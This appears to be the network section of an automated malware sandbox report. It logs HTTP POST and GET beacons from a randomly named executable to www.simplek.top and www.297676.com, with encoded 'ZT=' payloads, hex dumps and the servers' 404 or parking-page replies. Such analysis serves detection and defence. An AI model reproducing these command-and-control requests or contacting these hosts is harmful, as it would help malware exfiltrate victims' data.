                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              30192.168.2.450037203.161.49.193803804C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 30, 2024 08:12:32.151196957 CET727OUTPOST /ep69/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.simplek.top
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 219
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.simplek.top
                                                                                                                                                                              Referer: http://www.simplek.top/ep69/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Raw: 5a 54 3d 34 48 67 73 69 6e 46 47 54 4f 6e 36 4d 79 59 67 6d 6b 79 57 6a 46 67 70 44 6a 37 50 57 49 75 69 59 31 6b 52 64 72 35 38 37 6c 50 43 2f 4b 36 2f 64 45 56 35 50 55 71 68 2b 76 75 6e 45 37 33 37 6e 2f 78 74 4e 63 44 4c 51 55 4d 46 35 47 6a 63 5a 31 4b 4c 49 6f 70 55 4c 64 59 31 30 4a 57 7a 49 73 67 56 36 5a 4d 4d 45 58 55 79 50 6d 64 73 58 45 76 43 77 65 42 69 57 43 7a 67 52 34 35 43 6a 52 47 67 31 52 6c 59 50 77 69 49 79 2f 79 70 73 4f 36 4d 42 70 6f 2b 53 67 6c 53 6f 33 4c 53 6d 70 62 38 37 50 4f 31 4d 6d 50 71 57 66 6e 6d 56 4f 42 68 51 52 59 77 67 35 4b 50 57 45 62 41 30 78 2f 38 4a 74 39 36 43 32 31 7a 51 6b 73 38 4b 36 49 71 2f 45 30 3d
                                                                                                                                                                              Data Ascii: ZT=4HgsinFGTOn6MyYgmkyWjFgpDj7PWIuiY1kRdr587lPC/K6/dEV5PUqh+vunE737n/xtNcDLQUMF5GjcZ1KLIopULdY10JWzIsgV6ZMMEXUyPmdsXEvCweBiWCzgR45CjRGg1RlYPwiIy/ypsO6MBpo+SglSo3LSmpb87PO1MmPqWfnmVOBhQRYwg5KPWEbA0x/8Jt96C21zQks8K6Iq/E0=
                                                                                                                                                                              Oct 30, 2024 08:12:32.829319000 CET533INHTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Wed, 30 Oct 2024 07:12:32 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Content-Length: 389
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              31192.168.2.450038203.161.49.193803804C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 30, 2024 08:12:34.700097084 CET10809OUTPOST /ep69/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.simplek.top
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 10299
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.simplek.top
                                                                                                                                                                              Referer: http://www.simplek.top/ep69/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Raw: 5a 54 3d 34 48 67 73 69 6e 46 47 54 4f 6e 36 4d 79 59 67 6d 6b 79 57 6a 46 67 70 44 6a 37 50 57 49 75 69 59 31 6b 52 64 72 35 38 37 6b 62 43 2f 35 43 2f 63 6e 4e 35 49 55 71 68 69 2f 75 6b 45 37 32 35 6e 2f 70 68 4e 63 50 31 51 57 30 46 37 6b 72 63 49 33 79 4c 54 59 70 55 48 39 59 30 72 35 57 63 49 73 77 52 36 5a 63 4d 45 58 55 79 50 6c 46 73 51 56 76 43 39 2b 42 6a 42 79 7a 73 41 6f 34 76 6a 52 4f 57 31 52 67 6c 4f 44 61 49 38 2f 69 70 75 38 43 4d 49 70 6f 38 52 67 6c 30 6f 33 32 53 6d 6f 7a 4b 37 4f 4b 62 4d 6b 54 71 46 75 37 35 51 2f 68 44 4e 69 77 31 34 34 2b 38 59 7a 7a 36 37 54 58 35 50 4d 64 63 51 31 56 4e 62 48 5a 7a 52 4b 30 37 69 30 62 4e 6d 64 35 77 62 69 63 6d 31 73 50 51 70 4d 69 65 64 49 6e 4c 4d 65 37 65 5a 31 6f 54 61 4c 4c 50 7a 2b 58 32 49 79 72 34 39 4d 4d 30 4a 67 36 57 6d 35 76 42 6d 32 62 65 56 45 74 32 35 69 66 65 35 79 6e 63 50 4c 70 41 69 39 66 6c 72 63 32 65 46 33 6e 75 73 49 38 45 66 42 57 62 38 62 67 75 2b 55 6a 66 69 63 62 4d 78 44 61 74 4d 76 46 57 69 54 49 4d 69 55 78 [TRUNCATED]
                                                                                                                                                                              Data Ascii: ZT=4HgsinFGTOn6MyYgmkyWjFgpDj7PWIuiY1kRdr587kbC/5C/cnN5IUqhi/ukE725n/phNcP1QW0F7krcI3yLTYpUH9Y0r5WcIswR6ZcMEXUyPlFsQVvC9+BjByzsAo4vjROW1RglODaI8/ipu8CMIpo8Rgl0o32SmozK7OKbMkTqFu75Q/hDNiw144+8Yzz67TX5PMdcQ1VNbHZzRK07i0bNmd5wbicm1sPQpMiedInLMe7eZ1oTaLLPz+X2Iyr49MM0Jg6Wm5vBm2beVEt25ife5yncPLpAi9flrc2eF3nusI8EfBWb8bgu+UjficbMxDatMvFWiTIMiUxqESqrvgzoF3V2u1A4buPviEYt+QZjVLbM5iD6MgsJRAR5c29RHgMEioZIhWU8FeLQ02Z6I0AZApXQUyAGbx5uR3p1GorjuCSZlOvrEnjP0RiafbjirsgpyUvOotDhHJwivQYGer0l/3taHe6RyZyhcRclPqK4EdS72LgFtjIwHarNDd9LL8NjVPvret+hIpGV5CqSALs4MMkGl0OvEKkELQhsvqW66oIxl5921O4HGWxFUWPuV8Pdv533IMx0a6Wpo+oYSH5G/ccIwnYs16wD0DgitQSMpRpwhJYKTlI4os6jmKFRA1b09G7CVdaYDI/vkATiuFwlqFb+z5F51fe3ztw7GKP20/A3EAT5vvLTSIwUezzxoboRn7o54YC8T3fTMrtajqDCxEtad1x8+MDacuE00xcnC2oyCy8OGGCHAjcZI3nEGkTZfvlVuRUbQucUIyjQOyXu4EvpL1+0HVbS+3AUM63O+5128dDsreTNUnDB6bR6RAO9/+Cj8IDZYqIve2OH5a5t5Rt0rVJdrCV/0y9UbxV4Vf8UBwsJ4nGOXq3aeyGpY4a54ybb5kj28/x8vw+I2kDBxHwm010NOwhI6jIYcJXHi1xPJAOaiaq/70xS1B6UUEJzdqCwIL8cbHv2btyUNxp90VkbEKsi38ilJuwnwVCykZCtg [TRUNCATED]
                                                                                                                                                                              Oct 30, 2024 08:12:35.379117012 CET533INHTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Wed, 30 Oct 2024 07:12:35 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Content-Length: 389
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              32192.168.2.450039203.161.49.193803804C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 30, 2024 08:12:37.241488934 CET444OUTGET /ep69/?ZT=1FIMhSJhU8+lHAAmrS+FlWYlLXz7aIiZYVZCfaZw4D7e7Ym+VFULEmTMy/HAB+T+rsRxHszMTzww+hC5XQWyLoZ+L/5l/vKoQeg/i8EmIWt3MnVCcXzM6O0=&mTkD=Gj2Ti2T0g4 HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.simplek.top
                                                                                                                                                                              Connection: close
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Oct 30, 2024 08:12:37.918967009 CET548INHTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Wed, 30 Oct 2024 07:12:37 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Content-Length: 389
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              33192.168.2.450040199.59.243.227803804C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 30, 2024 08:12:43.183733940 CET704OUTPOST /xyex/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.297676.com
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 199
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.297676.com
                                                                                                                                                                              Referer: http://www.297676.com/xyex/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Raw: 5a 54 3d 4c 54 48 63 6a 68 77 74 53 61 48 65 74 62 74 4e 33 4f 42 35 79 62 68 70 47 42 2f 31 66 73 78 45 46 7a 6b 2b 57 66 6b 71 71 62 33 75 39 4c 37 4e 62 73 4d 73 52 75 34 7a 34 68 75 72 39 59 33 4f 43 43 77 47 61 70 65 6d 79 42 79 52 49 30 76 69 70 68 57 68 39 46 77 37 6c 58 67 4d 63 6e 31 50 52 32 55 78 32 33 76 2f 7a 2b 31 49 2f 49 55 31 41 6f 6f 31 34 52 47 54 65 35 78 2b 69 77 45 73 50 2b 66 66 4f 67 67 58 73 6a 53 6a 4d 4d 4a 63 4f 56 41 4d 43 61 4d 4a 52 59 46 4a 54 75 39 48 69 50 73 4a 6e 43 34 76 37 63 78 34 50 62 4f 6c 68 45 38 76 6b 31 4c 61 47 54 64 6a 6d 61 57 63 75 77 3d 3d
                                                                                                                                                                              Data Ascii: ZT=LTHcjhwtSaHetbtN3OB5ybhpGB/1fsxEFzk+Wfkqqb3u9L7NbsMsRu4z4hur9Y3OCCwGapemyByRI0viphWh9Fw7lXgMcn1PR2Ux23v/z+1I/IU1Aoo14RGTe5x+iwEsP+ffOggXsjSjMMJcOVAMCaMJRYFJTu9HiPsJnC4v7cx4PbOlhE8vk1LaGTdjmaWcuw==
                                                                                                                                                                              Oct 30, 2024 08:12:43.809514999 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                              date: Wed, 30 Oct 2024 07:12:42 GMT
                                                                                                                                                                              content-type: text/html; charset=utf-8
                                                                                                                                                                              content-length: 1110
                                                                                                                                                                              x-request-id: 45b93edb-4621-4eb4-8517-45424482cbe1
                                                                                                                                                                              cache-control: no-store, max-age=0
                                                                                                                                                                              accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                              critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                              vary: sec-ch-prefers-color-scheme
                                                                                                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VvMkd70pcaa++xPHPET7k8HS9oPvuvUA+ckFU+grDEVs81sT6IXsqQaYMUjfPOmNLH9DqeVG1jduG9TKC3NhDw==
                                                                                                                                                                              set-cookie: parking_session=45b93edb-4621-4eb4-8517-45424482cbe1; expires=Wed, 30 Oct 2024 07:27:43 GMT; path=/
                                                                                                                                                                              connection: close
                                                                                                                                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 56 76 4d 6b 64 37 30 70 63 61 61 2b 2b 78 50 48 50 45 54 37 6b 38 48 53 39 6f 50 76 75 76 55 41 2b 63 6b 46 55 2b 67 72 44 45 56 73 38 31 73 54 36 49 58 73 71 51 61 59 4d 55 6a 66 50 4f 6d 4e 4c 48 39 44 71 65 56 47 31 6a 64 75 47 39 54 4b 43 33 4e 68 44 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VvMkd70pcaa++xPHPET7k8HS9oPvuvUA+ckFU+grDEVs81sT6IXsqQaYMUjfPOmNLH9DqeVG1jduG9TKC3NhDw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                                                                              Oct 30, 2024 08:12:43.809561968 CET563INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                                                                              Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNDViOTNlZGItNDYyMS00ZWI0LTg1MTctNDU0MjQ0ODJjYmUxIiwicGFnZV90aW1lIjoxNzMwMjcyMz


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              34192.168.2.450041199.59.243.227803804C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 30, 2024 08:12:45.732055902 CET724OUTPOST /xyex/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.297676.com
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 219
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.297676.com
                                                                                                                                                                              Referer: http://www.297676.com/xyex/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Raw: 5a 54 3d 4c 54 48 63 6a 68 77 74 53 61 48 65 38 4c 39 4e 31 76 42 35 36 62 68 71 4b 68 2f 31 52 4d 78 66 46 7a 67 2b 57 64 49 36 72 70 54 75 36 70 6a 4e 61 74 4d 73 45 75 34 7a 67 52 75 75 67 6f 33 46 43 44 4e 7a 61 6f 69 6d 79 42 6d 52 49 30 66 69 70 79 2b 67 39 56 77 35 74 33 67 43 54 48 31 50 52 32 55 78 32 33 54 52 7a 2f 64 49 2f 35 6b 31 47 39 63 32 31 78 47 63 5a 35 78 2b 6d 77 45 6f 50 2b 66 78 4f 68 38 39 73 68 61 6a 4d 4a 6c 63 4f 41 73 50 4a 61 4d 31 4f 6f 45 39 54 74 41 4e 74 74 46 61 6e 7a 59 32 30 2b 49 65 44 39 44 2f 77 31 64 34 32 31 76 70 62 55 55 58 72 5a 72 56 31 38 7a 51 56 46 35 78 6b 69 51 54 78 42 4e 52 2b 66 32 35 36 64 38 3d
                                                                                                                                                                              Data Ascii: ZT=LTHcjhwtSaHe8L9N1vB56bhqKh/1RMxfFzg+WdI6rpTu6pjNatMsEu4zgRuugo3FCDNzaoimyBmRI0fipy+g9Vw5t3gCTH1PR2Ux23TRz/dI/5k1G9c21xGcZ5x+mwEoP+fxOh89shajMJlcOAsPJaM1OoE9TtANttFanzY20+IeD9D/w1d421vpbUUXrZrV18zQVF5xkiQTxBNR+f256d8=
                                                                                                                                                                              Oct 30, 2024 08:12:46.357311010 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                              date: Wed, 30 Oct 2024 07:12:46 GMT
                                                                                                                                                                              content-type: text/html; charset=utf-8
                                                                                                                                                                              content-length: 1110
                                                                                                                                                                              x-request-id: f26329f9-1af9-4058-b154-17022d833e72
                                                                                                                                                                              cache-control: no-store, max-age=0
                                                                                                                                                                              accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                              critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                              vary: sec-ch-prefers-color-scheme
                                                                                                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VvMkd70pcaa++xPHPET7k8HS9oPvuvUA+ckFU+grDEVs81sT6IXsqQaYMUjfPOmNLH9DqeVG1jduG9TKC3NhDw==
                                                                                                                                                                              set-cookie: parking_session=f26329f9-1af9-4058-b154-17022d833e72; expires=Wed, 30 Oct 2024 07:27:46 GMT; path=/
                                                                                                                                                                              connection: close
                                                                                                                                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 56 76 4d 6b 64 37 30 70 63 61 61 2b 2b 78 50 48 50 45 54 37 6b 38 48 53 39 6f 50 76 75 76 55 41 2b 63 6b 46 55 2b 67 72 44 45 56 73 38 31 73 54 36 49 58 73 71 51 61 59 4d 55 6a 66 50 4f 6d 4e 4c 48 39 44 71 65 56 47 31 6a 64 75 47 39 54 4b 43 33 4e 68 44 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
